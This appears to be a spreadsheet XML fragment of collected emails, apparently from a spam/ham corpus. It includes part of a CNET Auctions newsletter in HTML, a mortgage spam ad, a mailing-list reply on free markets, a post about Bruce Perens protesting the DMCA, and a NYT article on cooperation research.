 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;8MB Smartmedia Card&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;Seamless 2X Digital Zoom&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;1280 x 960 Pixel Resolution&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;Auto Connect USB Function&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;Olympus TruePic Technology&lt;/b&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/td&gt;
 &lt;td width="35%"&gt;
 &lt;div align="center"&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
 &lt;tr&gt;
 &lt;td width="100%" valign="center"&gt;&lt;center&gt;
 &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9IEAhCBzeFOPq1FsnysR" &gt;
 &lt;img border="0" src="http://auctions.cnet.com/images/dispatch/olympus_top.gif"&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" align="center"&gt;
 &lt;font color="#CC0000" face="Arial"&gt;&lt;b&gt;
 Bidding starts at &lt;font size=6&gt; $99&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td width="100%" colspan="2"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" align="center"&gt;&lt;b&gt;&lt;font face="Arial"
 color="#0000FF"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BskD069pBLF5vLk7KCgFZR" &gt;
 &lt;u&gt;Don't miss out, place your bid now!&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p&gt;&lt;IMG height=4 src="http://www.cnet.com/b.gif" width=1&gt;&lt;BR&gt;
 &lt;IMG height=1 src="http://www.cnet.com/b.gif" width=8&gt;&lt;/TD&gt;
 &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt; &lt;BR&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;
 &lt;DIV style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- main content --&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BMunENkcUmobF8XEDxwcdR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_hot.gif"
 width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpEQ0CYebsA10-kl0aSxkZcR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/kodak_picmaker.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwy7yD7PzlRXGugH6NQYvURR" &gt;
 &lt;b&gt;Kodak/Lexmark 1200dpi Printer&lt;br&gt;w/FlashCard Reader &amp; Photo LCD&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$49&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=fb-aWErQkg7jGW0-ACoFokcTbTDoVFR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/lexmark82.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLyxUxBX3VynhNBuCqcR" &gt;
 &lt;b&gt;Lexmark Z-82 Color Copier/Scanner/Printer Combo&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=26-KqPVIiMxelspOSrBBBkqU8niQ7RR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/gateway.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxKv3pLEuFPcZsjpRp-LFR" &gt;
 &lt;b&gt;Gateway XP P4 1.5GHz/256MB PC-266/64MB AGP&lt;br&gt;40GB 7200RPM/24x10x40x CD-RW PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$551&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=50-M_CBIR0cwZMQ3l6ASOnO8CtmMg4R" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/monitor.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dgc7CDQD70VOf0m8P9eR" &gt;
 &lt;b&gt;Sony/Sun .28mm 20-inch Trinitron Monitor&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$9&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=7a-EE_AIPB8prSy2S1hU6coezkBZXyR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/metal_detector.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KJgWwrREfXvsg9tyQFWvZR" &gt;
 &lt;b&gt;Hand Held Security Wand Metal Detector&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$16.50&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_fyrbksIC1b2OB8OEuR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/dispatch_PC.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTW-bcJVxhOmI_uIUEksR" &gt;
 &lt;b&gt;Intel 900MHz/256MB PC-133/10X DVD-ROM/20GB PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$229&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw7pdXwJaylIO7r3fxZR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_end.gif" width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jBj5mKI81u0PT_Qv1dR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/canon656u.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQ94HDISM_svdGheo-cR" &gt;
 &lt;b&gt;Canon CanoScan N670U 48-Bit Flatbed Scanner&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=0e--eOTIiQIuxlJGNz4r8dJx98lbKRR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/dispatch_PC.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMy40OaiAv2Y9ZZvQKFR" &gt;
 &lt;b&gt;P4 Celeron 1.7GHz/nVidia 32MB&lt;br&gt;256MB PC-133/16x DVD/20GB PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$399&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=38-bLkmIRM1EYfRcJCnhJiSUxuD-D9R" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/soundblaster_live.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZkrpZ6Jh6daB0S22bbKAeR" &gt;
 &lt;b&gt;Creative Sound Blaster Live! 5.1 Sound Card&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;/P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePOUIIE4iuG9TmIKJ15BRyR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_add.gif" width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpw7wmievfx31g9NPmdZPPR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/modem_creative.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvyTkOXmIiSupcptbPMuR" &gt;
 &lt;b&gt;Creative Blaster 56K PCI V.92 Fax Modem &lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$17.75&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFgG9bxB9R0CGk_HtsosR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/iomega_predator.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHO5rD2OY0NpbnpTbdL3ZR" &gt;
 &lt;b&gt;Iomega Predator 4x4x6 External USB CD-RW&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$49.99&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=cc-h4fQQ0O79aGRROU7qeZDozn6f5dR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/monitor.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk1PgLospPPhsYK3Awi9qcR" &gt;
 &lt;b&gt;NEC 21-inch .28mm Multi-Sync Monitor&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$9&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a name="h5"&gt;&lt;img src="http://www.cnet.com/i/nl/au/sub_ques.gif"
 width=310 height=19&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 Please send all questions, comments, and concerns regarding the CNET
 Auctions Newsletter to &lt;a
 href="mailto:auctions@cnet.com"&gt;auctions@cnet.com&lt;/a&gt; and include the
 Newsletter title in the subject line.
 &lt;p&gt;
 &lt;b&gt;NOTE:&lt;/b&gt; All product information, including prices, features, and
 availability, is subject to change without notice.
 &lt;P&gt;
 &lt;a name="h6"&gt;
 &lt;!-- /main content --&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=f6-QktIQMwQkvTRWpQYYRGOT9_JmpRR" &gt;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HREF="http://clickthru.online.com/Click?q=0b-0NN-zBQ8MFn_y6Q_ftSpRM8eiX4jGsRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org'&gt;
 Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdkyulmSWYoQqYoj1cTQ4cR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiIamXBReoaMxvH3QainXQRR"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href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWWMbAdQP9VA35c54JMlR" &gt;&lt;img
 src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37"
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hThc0SDLN8S_eSgFWV4R" &gt;&lt;font
 color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zF71Qjo_rjups7LLZ5eR" &gt;&lt;font
 color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0VloGk6SSEYIEElDh4B1FR" &gt;&lt;font color="#000000"&gt;Tech
 news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7cNjHsKPUByjw2PB1s79R" &gt;&lt;font
 color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq5NydZWZ1PHq15ZNEEZuR"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size="-2"&gt;&lt;tr:ad
 name="copyright"/&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ca-icRu-TglC1LXyUCC_L2mgWcDhRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: sed /s/United States/Roman Empire/g
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; Take a list of the richest countries.
 &gt;
 &gt; Take a list of the countries that have the counties where markets are
 &gt; the most free.
 &gt;
 &gt; They are, essentially, the same list.
 Umm... how many of these countries were in poverty &amp; lifted themselves up
 after switching?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Interest rates slashed! Don't wait!                                                   ccaxc
</t>
  </si>
  <si>
    <t xml:space="preserve">INTEREST RATES HAVE JUST BEEN CUT!!!
 NOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. 
 http://www.newnamedns.com/refi/
 Easy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!
 ---------------------------------------
 To unsubscribe, go to: 
 http://www.newnamedns.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: At last, a real DRM hero
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Remember when I said that taking an afternoon off to march for Dmitri
 was pissing in the wind and that to be really effective we needed
 people willing to publically break the stupid laws right in the
 face of the authorities?
 Well it seems Bruce Perens agrees with me, only he's going one better,
 instead of just mouthing off about it, he's going to do it and do it 
 in a big way ...
     Open source campaigner to risk jail
     By James Middleton [24-07-2002]
     Bruce Perens plans live DVD hack
     With the dust from the Elcomsoft/Sklyarov case still thick in the
     air, influential open source activist Bruce Perens plans to go one
     better by breaking the Digital Millennium Copyright Act (DCMA)
     during a live presentation on Friday.
     Fresh from giving RealNetworks a slating for not completely
     backing open source with its latest announcement, Perens said that
     during a Digital Rights Management presentation to be held Friday
     at the O'Reilly developer conference in San Diego, he would break
     the law.
     The DMCA has been a sore point in the open source community since
     the outlawing of DeCSS, a tool created so that DVDs could be
     played on Linux machines, and more recently since the arrest of
     Dmitry Sklyarov and the criminal charges faced by his employer,
     Elcomsoft.
     Based on the recent history of DMCA contravention, Perens could
     face imprisonment or a $500,000 fine for his actions.
     According to Infoworld the demonstration is to be carried out in
     protest at the regional system used by the motion picture industry
     to prevent DVDs released in one country being played on machines
     in another country.
     During his presentation, Perens will demonstrate how to hack a DVD
     player so that it can play movies from any region.
     "It is a political and social statement, and the statement is that
     the people do not need to have a hall monitor living in their
     stereo system and should be able to play any kind of media on the
     device they wish," he was quoted as saying.
     But luck may be on his side, if last year is anything to go by. At
     the same conference in 2001 Perens made a presentation on the
     triviality of Digital Rights Management systems using exactly the
     same slides that got Sklyarov arrested.
 http://www.vnunet.com/News/1133862
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: Why We're So Nice: We're Wired to Cooperate
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 Axelrod, eh? "the E.coli of social psychology"? Nice to see our old friend still going strong -- Prisoner's Dilemma is old enough to qualify for AARP membership!
 Regarding experimental design, it is interesting that 1) they used an all-female panel and 2) they included a mix of ages, from 20-60 and 3) they used humans, confederates, computers as well as imitations. 
 The last two paragraphs are a rare sign of editorialized humor by an NY Times bylined writer. Even still, note the very large fig leaf -- the CEO joke is introduced in an on-the-record quote. 
 Not that we're talking about anything nearly as colorful as the Economist :-)
 RK
 khare@alumni.caltech.edu
 Why We're So Nice: We're Wired to Cooperate
 July 23, 2002
 By NATALIE ANGIER 
 What feels as good as chocolate on the tongue or money in
 the bank but won't make you fat or risk a subpoena from the
 Securities and Exchange Commission? 
 Hard as it may be to believe in these days of infectious
 greed and sabers unsheathed, scientists have discovered
 that the small, brave act of cooperating with another
 person, of choosing trust over cynicism, generosity over
 selfishness, makes the brain light up with quiet joy. 
 Studying neural activity in young women who were playing a
 classic laboratory game called the Prisoner's Dilemma, in
 which participants can select from a number of greedy or
 cooperative strategies as they pursue financial gain,
 researchers found that when the women chose mutualism over
 "me-ism," the mental circuitry normally associated with
 reward-seeking behavior swelled to life. 
 And the longer the women engaged in a cooperative strategy,
 the more strongly flowed the blood to the pathways of
 pleasure. 
 The researchers, performing their work at Emory University
 in Atlanta, used magnetic resonance imaging to take what
 might be called portraits of the brain on hugs. 
 "The results were really surprising to us," said Dr.
 Gregory S. Berns, a psychiatrist and an author on the new
 report, which appears in the current issue of the journal
 Neuron. "We went in expecting the opposite." 
 The researchers had thought that the biggest response would
 occur in cases where one person cooperated and the other
 defected, when the cooperator might feel that she was being
 treated unjustly. 
 Instead, the brightest signals arose in cooperative
 alliances and in those neighborhoods of the brain already
 known to respond to desserts, pictures of pretty faces,
 money, cocaine and any number of licit or illicit delights.
 "It's reassuring," Dr. Berns said. "In some ways, it says
 that we're wired to cooperate with each other." 
 The study is among the first to use M.R.I. technology to
 examine social interactions in real time, as opposed to
 taking brain images while subjects stared at static
 pictures or thought-prescribed thoughts. 
 It is also a novel approach to exploring an ancient
 conundrum, why are humans so, well, nice? Why are they
 willing to cooperate with people whom they barely know and
 to do good deeds and to play fair a surprisingly high
 percentage of the time? 
 Scientists have no trouble explaining the evolution of
 competitive behavior. But the depth and breadth of human
 altruism, the willingness to forgo immediate personal gain
 for the long-term common good, far exceeds behaviors seen
 even in other large-brained highly social species like
 chimpanzees and dolphins, and it has as such been difficult
 to understand. 
 "I've pointed out to my students how impressive it is that
 you can take a group of young men and women of prime
 reproductive age, have them come into a classroom, sit down
 and be perfectly comfortable and civil to each other," said
 Dr. Peter J. Richerson, a professor of environmental
 science and policy at the University of California at Davis
 and an influential theorist in the field of cultural
 evolution. "If you put 50 male and 50 female chimpanzees
 that don't know each other into a lecture hall, it would be
 a social explosion." 
 Dr. Ernst Fehr of the University of Zurich and colleagues
 recently presented findings on the importance of punishment
 in maintaining cooperative behavior among humans and the
 willingness of people to punish those who commit crimes or
 violate norms, even when the chastisers take risks and gain
 nothing themselves while serving as ad hoc police. 
 In her survey of the management of so-called commons in
 small-scale communities where villagers have the right, for
 example, to graze livestock on commonly held land, Dr.
 Elinor Ostrom of Indiana University found that all
 communities have some form of monitoring to gird against
 cheating or using more than a fair share of the resource. 
 In laboratory games that mimic small-scale commons, Dr.
 Richerson said, 20 to 30 percent have to be coerced by a
 threat of punishment to cooperate. 
 Fear alone is not highly likely to inspire cooperative
 behavior to the degree observed among humans. If research
 like Dr. Fehr's shows the stick side of the equation, the
 newest findings present the neural carrot - people
 cooperate because it feels good to do it. 
 In the new findings, the researchers studied 36 women from
 20 to 60 years old, many of them students at Emory and
 inspired to participate by the promise of monetary rewards.
 The scientists chose an all-female sample because so few
 brain-imaging studies have looked at only women. Most have
 been limited to men or to a mixture of men and women. 
 But there is a vast body of non- imaging data that rely on
 using the Prisoner's Dilemma. 
 "It's a simple and elegant model for reciprocity," said Dr.
 James K. Rilling, an author on the Neuron paper who is at
 Princeton. "It's been referred to as the E. coli of social
 psychology." 
 &gt;&gt;From past results, the researchers said, one can assume
 that neuro- imaging studies of men playing the game would
 be similar to their new findings with women. 
 The basic structure of the trial had two women meet each
 other briefly ahead of time. One was placed in the scanner
 while the other remained outside the scanning room. The two
 interacted by computer, playing about 20 rounds of the
 game. In every round, each player pressed a button to
 indicate whether she would "cooperate" or "defect." Her
 answer would be shown on-screen to the other player. 
 The monetary awards were apportioned after each round. If
 one player defected and the other cooperated, the defector
 earned $3 and the cooperator nothing. If both chose to
 cooperate, each earned $2. If both opted to defect, each
 earned $1. 
 Hence, mutual cooperation from start to finish was a far
 more profitable strategy, at $40 a woman, than complete
 mutual defection, which gave each $20. 
 The risk that a woman took each time she became greedy for
 a little bit more was that the cooperative strategy would
 fall apart and that both would emerge the poorer. 
 In some cases, both women were allowed to pursue any
 strategy that they chose. In other cases, the non- scanned
 woman would be a "confederate" with the researchers,
 instructed, unbeknown to the scanned subject, to defect
 after three consecutive rounds of cooperation, the better
 to keep things less rarefied and pretty and more lifelike
 and gritty. 
 In still other experiments, the woman in the scanner played
 a computer and knew that her partner was a machine. In
 other tests, women played a computer but thought that it
 was a human. 
 The researchers found that as a rule the freely
 strategizing women cooperated. Even occasional episodes of
 defection, whether from free strategizers or confederates,
 were not necessarily fatal to an alliance. 
 "The social bond could be reattained easily if the defector
 chose to cooperate in the next couple of rounds," another
 author of the report, Dr. Clinton D. Kilts, said, "although
 the one who had originally been `betrayed' might be wary
 from then on." 
 As a result of the episodic defections, the average
 per-experiment take for the participants was in the $30's.
 "Some pairs, though, got locked into mutual defection," Dr.
 Rilling said. 
 Analyzing the scans, the researchers found that in rounds
 of cooperation, two broad areas of the brain were
 activated, both rich in neurons able to respond to
 dopamine, the brain chemical famed for its role in
 addictive behaviors. 
